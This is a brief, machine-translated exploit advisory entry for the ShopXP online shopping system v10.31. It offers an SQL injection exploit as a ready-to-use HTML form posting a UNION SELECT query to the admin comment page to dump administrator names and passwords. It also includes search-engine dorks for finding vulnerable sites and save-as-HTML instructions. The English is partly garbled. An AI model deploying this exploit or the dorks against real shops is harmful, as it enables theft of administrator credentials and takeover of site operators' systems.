SHOPXP online shopping system v10. 3 1 injection vulnerability Exp-vulnerability warning-the black bar safety net

2010-04-26T00:00:00
ID MYHACK58:62201026803
Type myhack58
Reporter 佚名
Modified 2010-04-26T00:00:00

Description

Limitations is very big, also is the background a file didn't do the filter. So yeah, a lot of stations changed the background, so is useless.

EXP:

<!-- ShopXp_Oday --> <!-- inurl:xpCatalog_xpDesc. asp? action_key_order= Or inurl:shopxp_news. asp - >

<form action="<http://127.0.0.1/admin/pinglun.asp?id=1%20and%201=2%20union%20select%201,password,password,admin,admin,password,password,password,password,password,password%20from%20shopxp_admin>" method="post" > <label> <div align="left">ShopXp Oday

<input name="Injection" type="submit" value="injection."> </div> </label> </form>

Copy, paste, Save As. html file

!